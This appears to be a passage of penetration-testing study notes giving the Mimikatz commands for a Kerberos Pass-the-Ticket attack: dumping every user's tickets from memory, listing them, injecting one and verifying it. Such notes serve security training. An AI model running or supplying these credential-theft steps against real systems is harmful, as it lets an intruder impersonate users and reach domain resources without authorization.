5. Pass-the-Ticket
- Dumped tickets from memory may be exported and used anywhere
- Also, if the tickets belong to the current user no administrative privileges are needed
Pass-the-Ticket using Mimikatz:
- Start Mimikatz and enable debug.
- Dump all Kerberos tickets from memory (including logged in users):
sekurlsa::tickets /export
- List all dumped tickets:
dir *.kirbi
- Inject any selected ticket:
kerberos::ptt ticket.kirbi
- Examine ticket:
klist